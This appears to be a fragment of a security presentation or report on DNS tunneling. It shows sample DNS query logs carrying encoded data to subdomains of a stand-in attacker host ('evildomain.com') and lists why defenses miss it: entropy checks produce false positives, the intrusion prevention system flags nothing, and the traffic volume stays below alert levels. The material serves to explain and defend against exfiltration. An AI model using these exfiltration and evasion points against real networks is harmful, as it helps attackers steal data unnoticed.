rhucuss5ltvl6ro6fihbezjfaicylazfswe5p5hv6eum353dkzla.evildomain.com IN A + query: 7br6hg23wbzxya7oupimz5ofq57krsw4ahvblfqsodt2r4nkjunq.evildomain.com IN A + query: 5rft2mx4lejdjccmemwqgdfykbwpgfku4sev2kb6rzs7adl4cxcq.evildomain.com IN A + query: ntqa7b4n434zqbwdndxgq2xkxd5ws4daerqbhtrobess4uqq6ovq.evildomain.com IN A + Exfiltrated data looks too much like normal content delivery network traffic; hostname entropy detection yields false positives. Network Intrusion Prevention System Only DNS queries detected, no DNS based threats; too much query traffic to sort through DNS traffic shows increase in flow report, but overall volume of traffic is too low to generate an alert or cause analysts to notice.